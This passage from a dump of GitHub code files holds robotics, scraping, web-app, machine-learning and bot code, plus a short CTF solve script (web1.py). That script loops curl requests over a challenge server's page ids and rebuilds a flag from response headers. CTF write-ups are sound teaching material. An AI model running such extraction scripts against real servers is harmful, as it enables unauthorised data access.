set_switch(cls, switch):\n cls.__switch = switch\n\n @classmethod\n def back_ops(cls):\n # time.sleep(2)\n cls.__driver.find_element_by_xpath(\"//div[@class='el-scrollbar__view']/span[1]\").click()\n cls.__driver.refresh()\n pass","repo_name":"zouqiaoyang/web-","sub_path":"utils/driver_utils.py","file_name":"driver_utils.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12771354512","text":"#!/usr/bin/env python\nimport sys, rospy\nfrom piavatar_ros.msg import LightSensorValues\n\nif __name__ == '__main__':\n devfile = '/dev/rtlightsensor0'\n rospy.init_node('lightsensors')\n pub = rospy.Publisher('lightsensors', LightSensorValues, queue_size=1)\n\n rate = rospy.Rate(1)\n while not rospy.is_shutdown():\n try:\n with open(devfile, 'r') as f:\n data = f.readline().split()\n data = [ int(e) for e in data ]\n d = LightSensorValues()\n d.right_forward = data[0]\n d.right_side = data[1]\n d.left_side = data[2]\n d.left_forward = data[3]\n d.sum_all = sum(data)\n d.sum_forward = data[0] + data[3]\n pub.publish(d)\n except IOError:\n rospy.logerr(\"cannot read from \" + devfile)\n\n rate.sleep()\n \n","repo_name":"shodimaggio/piavatar_ros","sub_path":"src/lightsensors2.py","file_name":"lightsensors2.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72911196626","text":"# ordinal numbers are the numbers written in natural language.\n# ie: for integer '1' the ordinal number is 'one'.\n# ie: for integer '2' the ordinal number is 'two'.\n\n\ndef int_to_ordinal(integer, ORDINAL):\n '''This function converts an integer to its ordinal number.'''\n for ordinal in ORDINAL:\n if ordinal == integer:\n print('...')\n return ORDINAL[ordinal]\n print('!!!')\n return ' '\n\n\ndef main():\n ORDINAL = {\n 1: 'one',\n 2: 'two',\n 3: 'three',\n 4: 'four',\n 5: 'five',\n 6: 'six',\n 7: 'seven',\n 8: 'eight',\n 9: 'nine',\n 10: 'ten',\n 11: 'eleven',\n 12: 'twelve',\n }\n # for ordinal in ORDINAL:\n # print(ORDINAL[ordinal])\n \n print('Enter an integer.')\n integer = int(input('> '))\n result = int_to_ordinal(integer, ORDINAL)\n print('Result =', result)\n\nif __name__ == '__main__':\n main()","repo_name":"farazahmediu01/The-Python-Workbook-","sub_path":"Experiment/Exercise 89 Convert an Integer to Its Ordinal Number.py","file_name":"Exercise 89 Convert an Integer to Its Ordinal Number.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14376006846","text":"import json\r\nimport requests\r\nfrom requests.exceptions import RequestException\r\nimport re\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.parse import quote\r\nimport os\r\nfrom all_events import med_events\r\nimport pickle\r\n\r\nimport sys\r\nsys.setrecursionlimit(1000000)\r\n\r\n\r\ndef get_one_page(url):\r\n try:\r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36'\r\n }\r\n response = requests.get(url, headers=headers)\r\n if response.status_code == 200:\r\n return response.text\r\n return None\r\n except RequestException:\r\n return None\r\n\r\n\r\ndef get_image_url(event_name,use_cn=False):\r\n 
query_item = '+'.join(event_name.split(' '))\r\n base_url = 'https://www.google.com'\r\n language = 'en'\r\n suffix = '&hl=zh-CN'\r\n url = 'https://www.google.com/search?q={}'.format(query_item)\r\n\r\n if use_cn:\r\n url += suffix\r\n language = 'cn'\r\n html = get_one_page(url)\r\n soup = BeautifulSoup(html,'lxml')\r\n select_tag = {'en':'Images','cn':u'图片'}\r\n image_href = ''\r\n # fw = open('html.txt','w',encoding='utf-8')\r\n # fw.write(html)\r\n for link in soup.find_all('a',class_='hide-focus-ring'):\r\n # print(link.text)\r\n if link.text == select_tag[language]:\r\n image_href = link.get('href')\r\n \r\n # print(image_href)\r\n image_link_href = base_url + image_href\r\n return image_link_href\r\n\r\n\r\ndef find_google_image(event_name,use_cn=False):\r\n image_link_href = get_image_url(event_name,use_cn)\r\n html = get_one_page(image_link_href)\r\n # print(image_link_href)\r\n # fw = open('html.txt','w',encoding='utf-8')\r\n # fw.write(html)\r\n soup = BeautifulSoup(html,'lxml')\r\n\r\n related_concepts = []\r\n\r\n for tag in soup.find_all('span',class_=\"hIOe2\"):\r\n # print(tag.string)\r\n related_concepts.append(tag.string)\r\n return related_concepts\r\n\r\n\r\ndef parse_one_page(url):\r\n h_tag = ['h1','h2','h3','h4','h5','h6']\r\n p_tag = 'p'\r\n title = {ele:[] for ele in h_tag}\r\n content = []\r\n\r\n html = get_one_page(url)\r\n soup = BeautifulSoup(html,'lxml')\r\n\r\n # parse title\r\n for tag_name in h_tag:\r\n for tag in soup.find_all(tag_name):\r\n text = tag.text.strip()\r\n title[tag_name].append(text)\r\n\r\n for tag in soup.find_all('p'):\r\n text = tag.text.strip()\r\n content.append(text)\r\n\r\n return title, content\r\n\r\n\r\ndef crawl_google_articles(event_name,number = 50,use_cn = False):\r\n # pass\r\n print('Crawling pages of event: [{}]'.format(event_name))\r\n url = get_image_url(event_name,use_cn)\r\n html = get_one_page(url)\r\n soup = BeautifulSoup(html,'lxml')\r\n\r\n parse_links = []\r\n result_link_class = \"VFACy kGQAp sMi44c lNHeqe WGvvNb\"\r\n\r\n for tag in soup.find_all('a',class_=result_link_class):\r\n page_link = tag.get('href')\r\n if page_link != None:\r\n parse_links.append(page_link)\r\n if len(parse_links) >= number:\r\n break\r\n\r\n articles = {}\r\n\r\n for idx,page_link in enumerate(parse_links):\r\n print('{0}: Now parsing link {1}'.format(idx,page_link))\r\n try:\r\n now_time = time.time()\r\n title, content = parse_one_page(page_link)\r\n print('Finished')\r\n articles[page_link] = [title,content]\r\n time.sleep(2)\r\n except:\r\n print('Parse Error')\r\n\r\n return articles\r\n\r\n\r\ndef show_article(articles):\r\n for key in articles.keys():\r\n article = articles[key]\r\n title, content = article[0], article[1]\r\n print(title)\r\n\r\n\r\ndef main():\r\n save_dir = 'google_articles'\r\n for event in med_events:\r\n events_split = event.split('_')\r\n event_name = ' '.join(events_split)\r\n print('Now deal with event : {}'.format(event_name))\r\n event_dir = event\r\n event_google_file = event_dir + '_google_article.json'\r\n \r\n event_result_dir = os.path.join(save_dir,event_dir)\r\n # print(event_result_dir)\r\n if not os.path.exists(event_result_dir):\r\n os.makedirs(event_result_dir)\r\n\r\n related_concepts = find_google_image(event_name)\r\n print('related_concepts is : ',related_concepts)\r\n\r\n if os.path.exists(os.path.join(event_result_dir,event_google_file)):\r\n articles = json.load(open(os.path.join(event_result_dir,event_google_file)))\r\n else:\r\n related_concepts = find_google_image(event_name)\r\n print('related_concepts is : ',related_concepts)\r\n 
pickle.dump(related_concepts,open(os.path.join(event_result_dir,'google_concepts.pkl'),'wb'))\r\n articles = crawl_google_articles(event_name)\r\n json.dump(articles,open(os.path.join(event_result_dir,event_google_file),'w'))\r\n \r\n\r\n\r\ndef gen_google_first_order_concept():\r\n save_dir = 'google_articles'\r\n for event in med_events:\r\n event_result_dir = os.path.join(save_dir,event)\r\n related_concepts = pickle.load(open(os.path.join(event_result_dir,'google_concepts.pkl'),'rb'))\r\n print(event)\r\n print(related_concepts)\r\n\r\n\r\nif __name__ == '__main__':\r\n # main()\r\n gen_google_first_order_concept()\r\n\r\n","repo_name":"Rain-coder1/ZS-MED","sub_path":"search_google.py","file_name":"search_google.py","file_ext":"py","file_size_in_byte":5318,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"6565228551","text":"#!/usr/bin/env python3\n\nimport sys\nimport math\nsys.path.insert(0, '../../')\nimport util\n\nif __name__ == '__main__':\n\n ft = [math.factorial(i) for i in range(10)]\n\n l = []\n for i in range(11, 2600000):\n cur = list(str(i))\n cur = [ft[int(j)] for j in cur]\n if sum(cur) == i:\n l.append(i)\n\n print(sum(l))\n print(l)\n","repo_name":"bn-d/project_euler","sub_path":"000-100/034/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40215358592","text":"#!/usr/bin/env python\n\n\"\"\"\nThis program converts data from the DVL and IMU into the position of the robot.\nInput:\t/desistek_saga/dvl\n\t\t/desistek_saga/imu\nOutput:\t/odom\nIn __init__, set OFFSET_X, OFFSET_Y and OFFSET_Z equal to the distance in xyz between the DVL and the inertial center of the robot.\n\t , set STARTING_X, Y, Z equal to the xyz starting position of the robot, and STARTING_radianX, Y, Z equal to its orientation in radians\n\"\"\"\n\nimport rospy\nfrom sonar_mapping.msg import my_msg\nfrom uuv_sensor_ros_plugins_msgs.msg import DVL\nfrom sensor_msgs.msg import Imu\nfrom nav_msgs.msg import Odometry\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport sys\n\nclass dvl:\n\n\n\n\tdef __init__(self):\n\n\t\tsub_dvl = rospy.Subscriber('/desistek_saga/dvl', DVL, self.dvl_sub)\n\t\tsub_imu = rospy.Subscriber('/desistek_saga/imu', Imu, self.imu_sub)\n\t\tsub_correction = rospy.Subscriber('/SLAM/offset', my_msg, self.odom_sub)\n\n\t\tself.pubOdom = rospy.Publisher(\"/odom\", Odometry, queue_size=1)\n\n\t\tself.offset = my_msg()\n\n\t\t# value to correct the odometry with the SLAM\n\n\t\tself.timeDVL = rospy.get_time()\n\t\tself.previous_time = 0\n\t\tself.dvlseq = 0\n\t\tself.dvlsecs = 0\n\t\tself.dvlnsecs = 0\n\t\tself.dvlX = 0\n\t\tself.dvlY = 0\n\t\tself.dvlZ = 0\n\n\t\t####################### To be se correctly depending on the robot configuration ###################\n\t\tself.OFFSET_X = 0\n\t\tself.OFFSET_Y = 0\n\t\tself.OFFSET_Z = 0\n\n\t\tself.STARTING_X = -250\n\t\tself.STARTING_Y = 300\n\t\tself.STARTING_Z = -5\n\t\tself.STARTING_radianX = 0\n\t\tself.STARTING_radianY = 0\n\t\tself.STARTING_radianZ = -1.0\n\t\t###################################################################################################\n\n\t\tself.timeIMU = rospy.get_time()\n\t\tself.quaternionX = 0\n\t\tself.quaternionY = 0\n\t\tself.quaternionZ = 0\n\t\tself.quaternionW = 0\n\t\tself.imuX = 0\n\t\tself.imuY = 0\n\t\tself.imuZ = 0\n\t\tself.angvelX = 0\n\t\tself.angvelY = 0\n\t\tself.angvelZ = 
0\n\t\tself.lastImuX = 0\n\t\tself.lastImuY = 0\n\t\tself.lastImuZ = 0\n\n\t\tself.dvlReceived = False\n\n\t\tself.estimated_traj_x = self.STARTING_X\n\t\tself.estimated_traj_y = self.STARTING_Y\n\t\tself.estimated_traj_z = self.STARTING_Z\n\n\tdef odom_sub(self,msg):\n\n\t\tif msg.x == self.offset.x and msg.y == self.offset.y and msg.theta == self.offset.theta:\n\t\t\tpass\n\t\telse:\n\t\t\tself.offset.x += msg.x\n\t\t\tself.offset.y += msg.y\n\t\t\tself.offset.theta += msg.theta\n\n\n\n\t# The frequency of the DVL is lower than the IMU\n\tdef dvl_sub(self,msg):\n\t\tself.timeDVL = rospy.get_time()\n\n\t\tself.dvlseq = msg.header.seq\n\t\tself.dvlsecs = msg.header.stamp.secs\n\t\tself.dvlnsecs = msg.header.stamp.nsecs\n\t\tself.dvlX = msg.velocity.z \t\t############ /!\\ ###########\n\t\tself.dvlY = msg.velocity.y\n\t\tself.dvlZ = msg.velocity.x ############ /!\\ ###########\n\n\t\tself.dvlReceived = True\n\n\t# The frequency of the IMU is bigger than the DVL's\n\tdef imu_sub(self,msg):\n\t\tif self.dvlReceived == True:\n\t\t\tself.dvlReceived = False\n\t\t\tself.timeIMU = rospy.get_time()\n\t\t\tself.quaternionX = msg.orientation.x\n\t\t\tself.quaternionY = msg.orientation.y\n\t\t\tself.quaternionZ = msg.orientation.z\n\t\t\tself.quaternionW = msg.orientation.w\n\t\t\tX,Y,Z = self.quaternion_to_euler(self.quaternionX,self.quaternionY,self.quaternionZ,self.quaternionW)\n\t\t\tself.imuX = X\n\t\t\tself.imuY = Y\n\t\t\tself.imuZ = Z\n\n\t\t\tself.angvelX = msg.angular_velocity.x\n\t\t\tself.angvelY = msg.angular_velocity.y\n\t\t\tself.angvelZ = msg.angular_velocity.z\n\n\t\t\tself.estimateTraj()\n\n\n\tdef estimateTraj(self):\n\t\tdt = float(self.timeDVL - self.previous_time)\n\t\tX = self.dvlX - self.OFFSET_X*(self.imuZ-self.lastImuZ)/dt\n\t\tY = self.dvlY - self.OFFSET_Y*(self.imuZ-self.lastImuZ)/dt\n\n\t\tself.estimated_traj_x = self.estimated_traj_x + (X * dt * math.cos(self.imuZ) - Y * dt * math.sin(self.imuZ))\n\t\tself.estimated_traj_y = self.estimated_traj_y + (X * dt * math.sin(self.imuZ) + Y * dt * math.cos(self.imuZ))\n\t\tself.estimated_traj_z = self.estimated_traj_z - self.dvlZ * dt\n\t\tself.previous_time = self.timeDVL\n\t\tself.lastImuX = self.imuX + self.STARTING_radianX\n\t\tself.lastImuY = self.imuY + self.STARTING_radianY\n\t\tself.lastImuZ = self.imuZ + self.STARTING_radianZ\n\n\t\tself.convert_to_odom()\n\n\tdef convert_to_odom(self):\n\n\t\todm = Odometry()\n\t\todm.header.seq = self.dvlseq\n\t\trostime = rospy.get_time()\n\t\todm.header.stamp.secs = int(rostime)\n\t\todm.header.stamp.nsecs = 1000000000*(rostime-int(rostime))\n\n\t\todm.header.frame_id = \"world\"\n\t\t#odm.child_frame_id = \"desistek_saga/base_link\"\n\n\t\todm.pose.pose.position.x = self.offset.x + self.estimated_traj_x #- rospy.get_time()/16\n\t\todm.pose.pose.position.y = self.offset.y + self.estimated_traj_y #- rospy.get_time()/16\n\t\todm.pose.pose.position.z = self.estimated_traj_z\n\n\t\todm.pose.pose.orientation.x = self.quaternionX\n\t\todm.pose.pose.orientation.y = self.quaternionY\n\t\todm.pose.pose.orientation.z = self.quaternionZ\n\t\todm.pose.pose.orientation.w = self.quaternionW\n\n\t\tself.pubOdom.publish(odm)\n\n\tdef quaternion_to_euler(self,x,y,z,w):\n\t\tt0 = +2.0 * (w * x + y * z)\n\t\tt1 = +1.0 - 2.0 * (x * x + y * y)\n\t\tX = math.degrees(math.atan2(t0, t1))\n\n\t\tt2 = +2.0 * (w * y - z * x)\n\t\tt2 = +1.0 if t2 > +1.0 else t2\n\t\tt2 = -1.0 if t2 < -1.0 else t2\n\t\tY = math.degrees(math.asin(t2))\n\n\t\tt3 = +2.0 * (w * z + x * y)\n\t\tt4 = +1.0 - 2.0 * (y * y + z * 
z)\n\t\tZ = math.atan2(t3, t4)\n\n\t\treturn X, Y, Z\n\ndef main(args):\n\n\trospy.init_node('read_dvl', anonymous=True)\n\n\ta = dvl()\n\n\ttry:\n\t\trospy.spin()\n\texcept KeyboardInterrupt:\n\t\tprint(\"Shutting down\")\n\t\tcv2.destroyAllWindows()\n\nif __name__ == '__main__':\n\tmain(sys.argv)\n","repo_name":"Tim-HW/HW-BlueRov2-Sonar-based-SLAM","sub_path":"src/robot init/dvl.py","file_name":"dvl.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"48"} +{"seq_id":"8589512794","text":"from __future__ import annotations\nfrom typing import Any, TypeVar, List, Set, Type, Optional, Callable, Union, Dict, Tuple\n\nfrom grapl_analyzerlib.node_types import (\n EdgeT,\n EdgeRelationship,\n PropType,\n)\nfrom grapl_analyzerlib.nodes.base import BaseView, BaseQuery, BaseSchema\nfrom grapl_analyzerlib.schema import Schema\nfrom grapl_analyzerlib.viewable import Viewable\n\nEQ = TypeVar(\"EQ\", bound=\"EntityQuery\")\nEV = TypeVar(\"EV\", bound=\"EntityView\")\n\n\ndef default_entity_edges():\n from grapl_analyzerlib.nodes.lens import LensSchema\n from grapl_analyzerlib.nodes.risk import RiskSchema\n\n return {\n \"in_scope\": (\n (\n EdgeT(EntitySchema, LensSchema, EdgeRelationship.ManyToMany),\n \"scope\",\n )\n ),\n \"risks\": (\n (\n EdgeT(EntitySchema, RiskSchema, EdgeRelationship.ManyToMany),\n \"risky_nodes\",\n )\n ),\n }\n\n\nclass EntitySchema(BaseSchema):\n def __init__(\n self,\n properties: \"Optional[Dict[str, PropType]]\" = None,\n edges: \"Optional[Dict[str, Tuple[EdgeT, str]]]\" = None,\n view: \"Union[Type[Viewable], Callable[[], Type[Viewable]]]\" = None,\n ):\n super(EntitySchema, self).__init__(\n properties={**(properties or {})},\n edges={\n **default_entity_edges(),\n **(edges or {}),\n },\n view=(view or EntityView),\n )\n\n @staticmethod\n def self_type() -> str:\n return \"Entity\"\n\n\nclass EntityQuery(BaseQuery[EV, EQ]):\n def with_lenses(self, *lenses: \"LensQuery\"):\n lenses = lenses or [LensQuery()]\n self.set_neighbor_filters(\"in_scope\", [lenses])\n for lens in lenses:\n lens.set_neighbor_filters(\"scope\", [self])\n return self\n\n def with_risks(self, *risks: \"RiskQuery\"):\n risks = risks or [RiskQuery()]\n self.set_neighbor_filters(\"risks\", [risks])\n for risk in risks:\n risk.set_neighbor_filters(\"risky_nodes\", [self])\n return self\n\n @classmethod\n def node_schema(cls) -> Schema:\n return EntitySchema({}, {}, None)\n\n\nclass EntityView(BaseView[EV, EQ]):\n queryable = EntityQuery\n\n def __init__(\n self,\n uid: int,\n node_key: str,\n graph_client: Any,\n node_types: Set[str],\n lenses: \"List[LensView]\" = None,\n **kwargs,\n ):\n super().__init__(uid, node_key, graph_client, node_types, **kwargs)\n self.node_types = set(node_types)\n self.uid = uid\n self.node_key = node_key\n self.graph_client = graph_client\n self.lenses = lenses or []\n\n def get_lenses(self, *lenses, cached=False) -> List[LensView]:\n return self.get_neighbor(LensQuery, \"in_scope\", \"scope\", lenses, cached) or []\n\n def get_risks(self, *risks, cached=False) -> List[RiskView]:\n return self.get_neighbor(RiskQuery, \"risks\", \"risky_nodes\", risks, cached) or []\n\n def into_view(self, v: Type[Viewable]) -> Optional[Viewable]:\n if v.node_schema().self_type() in self.node_types:\n self.queryable = v.queryable\n return v(\n self.uid,\n self.node_key,\n self.graph_client,\n node_types=self.node_types,\n **self.predicates,\n )\n return None\n\n @classmethod\n def node_schema(cls) -> 
Schema:\n return EntitySchema({}, {}, EntityView)\n\n\nfrom grapl_analyzerlib.nodes.lens import LensQuery, LensView\nfrom grapl_analyzerlib.nodes.risk import RiskQuery, RiskView\n","repo_name":"macasieb/grapl","sub_path":"src/python/grapl_analyzerlib/grapl_analyzerlib/nodes/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"12445159733","text":"#coding=utf-8;\n\nimport tornado.web\nimport tornado.httpserver\nimport tornado.ioloop\nimport os\n\n# Configure settings\nsettings = dict(\n template_path = os.path.join(os.path.dirname(__file__),\"template\"),\n static_path = os.path.join(os.path.dirname(__file__),\"static\")\n)\n\n# Render the home page template\nclass HomeHandler(tornado.web.RequestHandler):\n def get(self, *args, **kwargs):\n self.render(\"home.html\");\n\n# Render the login page template\nclass LoginHandler(tornado.web.RequestHandler):\n def get(self, *args, **kwargs):\n self.render(\"login.html\");\n\n# Build the app\napp = tornado.web.Application(handlers=[(r\"/home\",HomeHandler),\n\n (r\"/login\",LoginHandler)\n ], **settings);\n\n\n# main function\nif __name__ == '__main__':\n http_server = tornado.httpserver.HTTPServer(app);\n http_server.listen(8080);\n tornado.ioloop.IOLoop.instance().start();\n","repo_name":"AlexanderYeah/SKMoreWorkSpace","sub_path":"Day1/SKMallDemo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70073103827","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\nimport streamlit as st\nimport pandas as pd\nfrom sklearn import datasets\nfrom sklearn.ensemble import RandomForestRegressor\nimport pickle\n\n\nst.write(\"\"\"\n# Boston House Price Prediction App\nThis app predicts the **Boston House Price**!\n\"\"\")\nst.write('---')\n\n# Loads the Boston House Price Dataset\nboston = datasets.load_boston()\nX = pd.DataFrame(boston.data, columns=boston.feature_names)\nY = pd.DataFrame(boston.target, columns=[\"MEDV\"])\n\n# Sidebar\n# Header of Specify Input Parameters\nst.sidebar.header('Specify Input Parameters')\n\ndef user_input_features():\n CRIM = st.sidebar.slider('CRIM', X.CRIM.min(), X.CRIM.max(), X.CRIM.mean())\n ZN = st.sidebar.slider('ZN', X.ZN.min(), X.ZN.max(), X.ZN.mean())\n INDUS = st.sidebar.slider('INDUS', X.INDUS.min(), X.INDUS.max(), X.INDUS.mean())\n CHAS = st.sidebar.slider('CHAS', X.CHAS.min(), X.CHAS.max(), X.CHAS.mean())\n NOX = st.sidebar.slider('NOX', X.NOX.min(), X.NOX.max(), X.NOX.mean())\n RM = st.sidebar.slider('RM', X.RM.min(), X.RM.max(), X.RM.mean())\n AGE = st.sidebar.slider('AGE', X.AGE.min(), X.AGE.max(), X.AGE.mean())\n DIS = st.sidebar.slider('DIS', X.DIS.min(), X.DIS.max(), X.DIS.mean())\n RAD = st.sidebar.slider('RAD', X.RAD.min(), X.RAD.max(), X.RAD.mean())\n TAX = st.sidebar.slider('TAX', X.TAX.min(), X.TAX.max(), X.TAX.mean())\n PTRATIO = st.sidebar.slider('PTRATIO', X.PTRATIO.min(), X.PTRATIO.max(), X.PTRATIO.mean())\n B = st.sidebar.slider('B', X.B.min(), X.B.max(), X.B.mean())\n LSTAT = st.sidebar.slider('LSTAT', X.LSTAT.min(), X.LSTAT.max(), X.LSTAT.mean())\n data = {'CRIM': CRIM,\n 'ZN': ZN,\n 'INDUS': INDUS,\n 'CHAS': CHAS,\n 'NOX': NOX,\n 'RM': RM,\n 'AGE': AGE,\n 'DIS': DIS,\n 'RAD': RAD,\n 'TAX': TAX,\n 'PTRATIO': PTRATIO,\n 'B': B,\n 'LSTAT': LSTAT}\n features = pd.DataFrame(data, index=[0])\n return features\n\ndf = user_input_features()\n\n# Main Panel\n\n# Print specified input 
parameters\nst.header('Specified Input parameters')\nst.write(df)\nst.write('---')\n\n# Build Regression Model\nmodel = RandomForestRegressor()\nmodel.fit(X, Y)\npickle.dump(model, open('boston.pkl', 'wb'))\n\n\n# Reads in saved classification model\nload_clf = pickle.load(open('boston.pkl', 'rb'))\n# Apply Model to Make Prediction\n\n\n# Apply model to make predictions\nprediction = load_clf.predict(df)\n\n\n\n\n","repo_name":"csezia/TestShop","sub_path":"app_run.py","file_name":"app_run.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9950827647","text":"#!/usr/bin/env python\nimport subprocess\n\nflag = ''\n\nfor id in range(0, 45):\n command = ('curl -i http://104.199.235.135:31331/index.php?p=' + str(id))\n content = subprocess.check_output(command, shell=True)\n flag += content[content.find('Content-Length')-3]\n \nprint(flag)\n","repo_name":"wy56/CTF-Write-Up","sub_path":"2018-ais3-pre-exam/web1/web1.py","file_name":"web1.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"70846677265","text":"from collections import deque\nimport sys\n# input = sys.stdin.readline\n\ndeq = deque()\nn = int(input())\nfor _ in range(n):\n 입력 = input()\n if 입력[0:4] == 'push':\n order, num = 입력.split()\n deq.append(num)\n elif 입력 == 'pop':\n if deq:\n print(deq.popleft())\n else:\n print(-1)\n elif 입력 == 'size':\n print(len(deq))\n elif 입력 == 'empty':\n if deq:\n print(0)\n else:\n print(1)\n elif 입력 == 'front':\n if deq:\n print(deq[0])\n else:\n print(-1)\n elif 입력 == 'back':\n if deq:\n print(deq[-1])\n else:\n print(-1)","repo_name":"hvvany/TIL","sub_path":"Algorithm/Baekjoon/code_folder/10845.py","file_name":"10845.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"31415028907","text":"from torch.utils.data.dataset import Dataset\nimport os\nfrom PIL import Image\nfrom torch.utils.data import DataLoader\nimport torch\nimport torch.nn as nn\nimport torchvision.transforms as transforms\nimport numpy as np\nimport traceback\nfrom IPython.display import display, clear_output\nimport config\nfrom torch.autograd import Variable\n\n\n##\n## Custom class for loading data\n##\nclass MyCustomDataset(Dataset):\n def __init__(self, percent, direc, transform,args):\n self.data_root = direc\n self.args=args\n self.transform = transform\n if (os.path.exists((os.path.join(self.data_root, '/labels')))):\n self.names = np.array([name for name in os.listdir((os.path.join(self.data_root, '/labels'+name)))])\n else: self.names = np.array([name for name in os.listdir(self.data_root)])\n if percent<0:self.names = self.names[0:-1*percent]\n else: self.names = self.names[0:int(percent*len(self.names)//100)]\n self.count = len(self.names)\n\n\n def __getitem__(self, index):\n name = self.names[index]\n rayed = torch.Tensor()\n if (os.path.exists((os.path.join(self.data_root, '/labels')))):\n img = Image.open((os.path.join(self.data_root, '/images/'+name)))\n rayed = Image.open((os.path.join(self.data_root, '/labels/'+name)))\n else:\n if(self.args.setup==4 or self.args.setup==5):\n img = Image.fromarray(np.load((os.path.join(self.data_root, name))))\n else:\n img = Image.open((os.path.join(self.data_root, name)))\n img = self.transform(img)\n # img = (img-img.min())/(img.max()-img.min())\n return (rayed, img)\n\n 
def __len__(self):\n return self.count\n\n\n##\n## Loading data for training/testing\n##\ndef load_data(args,test=False):\n data_train_loader, data_valid_loader, data_test_loader = [],[],[]\n if (not test):\n data_train = MyCustomDataset(args.dataperc,args.data_path+'/train', transform=transforms.Compose([\n transforms.Resize((config.size, config.size)),\n transforms.ToTensor()\n ]),args=args)\n\n data_train_loader = DataLoader(data_train, batch_size=args.batch_size, shuffle=True, num_workers=args.workers, drop_last=False)\n\n\n data_valid = MyCustomDataset(-args.valid,args.data_path+'/valid',transform=transforms.Compose([\n transforms.Resize((config.size, config.size)),\n transforms.ToTensor()\n ]),args=args)\n\n data_valid_loader = DataLoader(data_valid, batch_size=args.batch_size, shuffle=True, num_workers=args.workers, drop_last=False)\n if (test):\n data_test = MyCustomDataset(args.dataperc,args.data_path+'/test', transform=transforms.Compose([\n transforms.Resize((config.size, config.size)),\n transforms.ToTensor()\n ]),args=args)\n\n data_test_loader = DataLoader(data_test, batch_size=args.batch_size, shuffle=False, num_workers=args.workers, drop_last=False)\n\n return (data_train_loader, data_valid_loader, data_test_loader)\n\n\n##\n## Creating noisy version/scans after Radon from the truth\n##\ndef create(truths, mean):\n if(config.angles != 0):rayed = config.fwd_op_mod(truths)\n else: rayed=truths.clone()\n\n rayed += Variable(config.noise * mean * torch.randn(rayed.shape)).type_as(rayed)\n return rayed\n","repo_name":"Zakobian/CT_framework_","sub_path":"data_load.py","file_name":"data_load.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"26587867090","text":"from errbot import BotPlugin, botcmd, arg_botcmd, webhook\n\nimport evelink.api\n\nclass Contractor(BotPlugin):\n \"\"\"\n hack the planet\n \"\"\"\n \n def do_contract_update(self):\n self.log.info('CONTRACT UPDATING WILL GO HERE')\n\n def activate(self):\n \"\"\"\n Triggers on plugin activation\n \"\"\"\n self.log.info('Activating Contractor Plugin.')\n \n super(Contractor, self).activate()\n if not \"API_KEYS\" in self:\n self[\"API_KEYS\"] = {}\n if not \"CONTRACTS\" in self:\n self[\"CONTRACTS\"] = {}\n self.log.info('Starting contract poller.')\n \n self.start_poller(15*60, self.do_contract_update)\n \n @arg_botcmd('v_code', type=str)\n @arg_botcmd('key_id', type=int)\n def api_add(self, message, key_id, v_code):\n \"\"\"Add an api key to the contractor bot.\"\"\"\n return self.add_api_key(key_id, v_code)\n \n @botcmd\n def api_list(self, message, args):\n api_keys = self[\"API_KEYS\"]\n yield \"The following keys are being watched:\"\n for key_id in api_keys:\n yield key_id\n\n @arg_botcmd('key_id', type=int)\n def api_del(self, message, key_id):\n api_keys = self[\"API_KEYS\"]\n if key_id in api_keys:\n del api_keys[key_id]\n self[\"API_KEYS\"] = api_keys\n return \"Removed key with id {0}\".format(key_id)\n else:\n return \"There is no such key with id {0}\".format(key_id)\n \n def add_api_key(self, key_id, v_code):\n api_keys = self[\"API_KEYS\"]\n if key_id in api_keys:\n return \"The key with id {0} is already saved\".format(key_id)\n else:\n api = evelink.api.API(api_key=(key_id, v_code))\n request = evelink.account.Account(api=api).key_info()\n result = request.result\n type = result['type']\n \n api_keys[key_id] = dict(key=(key_id, v_code), type=type)\n self[\"API_KEYS\"] = api_keys\n 
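            # The key is persisted at this point; log it and report its details back to the caller.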
self.log.info(\"Saved API key with id {0}.\".format(key_id))\n # self.refresh_contracts_for_api(api_keys])\n if type == 'char' or type == 'account':\n characters = []\n for character_id, character_info in result['characters'].items():\n characters.append(character_info['name'])\n names = \", \".join(characters)\n return \"Added {} key (characters: {}) with id {} and expiry {}\".format(result['type'], names, key_id, result['expire_ts'])\n else:\n return \"Added {} key with id {} and expiry {}\".format(result['type'], key_id, result['expire_ts'])\n \n def refresh_contracts_for_api(self, api_info):\n saved_contracts = self[\"CONTRACTS\"]\n api = evelink.api.API(api_key=api_info['key'])\n \n self.log.info(\"Refreshing api key ({!s}, {})\", api_info['key'][0], api_info['key'][1])\n key_info = evelink.account.Account(api=api).key_info().result\n \n for character_id in key_info['characters']:\n char = evelink.char.Char(char_id=character_id, api=api)\n contracts_result = 